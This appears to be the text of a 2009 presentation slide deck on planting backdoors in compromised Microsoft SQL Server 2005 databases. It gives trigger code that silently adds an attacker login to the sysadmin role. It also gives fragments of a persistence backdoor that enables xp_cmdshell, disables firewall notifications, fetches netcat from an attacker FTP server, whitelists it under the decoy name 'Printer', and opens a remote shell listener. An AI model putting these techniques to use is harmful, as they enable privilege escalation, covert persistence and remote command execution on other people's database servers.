Duong Ngo October 14, 2009
Jan 13, 2016
Duong Ngo October 14, 2009
POST-EXPLOITATION
Got access to a MSSQL box? (SQL injection, brute force…)
Privileges: sa / dbo / normal user
Got all data
Now what’s next??
Backdoors
Provide easier access to the compromised box in the future
Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell,
CGITelnet..)
So how’s about Database Backdoor?? YES!
SQL Server 2005 Backdoor
We’ll create a backdoor based on SQLServer Trigger.
What’s Trigger?
Database Trigger
Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)
Trigger gets executed under the security context of who caused trigger to fire!
EXAMPLE – Create trigger
Context: Normal User with Create Trigger permission:
CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE
AS
EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘
EXAMPLE – Trigger got fired Context: sa (server admin) sa> DELETE * FROM tblCustomers
RESULT??User: “Hacker” now become sysadmin
What can we do with that? Privilege escalation: normal user ->
higher role
Database backdoor
SQLServer Backdoor features: - Execute subsequent commands if current user is 'sa‘
- Enable xp_cmdshell - Create new login 'backdoor' and add it to sysadmin
server role. - Disable firewall notification mode - Add ftp to allowed programs list - Get netcat from attacker ftp server - Create a directory 'Backdoor_activated' in attacker
ftp server to let attacker knows whenever the backdoor has been started.
- Open netcat in listen mode attached with sql command line client Osql.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
ASBEGINDECLARE @cur_user varchar(200)……CREATE LOGIN [backdoor] WITH PASSWORD =
'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame =
N'Backdoor', @rolename =N'sysadmin'--disable firewall notification modeExec master..xp_cmdshell 'netsh firewall set notifications
disable‘…..
Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION
….….
Our Backdoor’s Code (cont)-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfileEXEC master..xp_cmdshell @cmd, NO_OUTPUT……
-- After get netcat, add netcat to firewall’s allowedprogram list
SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
Thank You for listening!!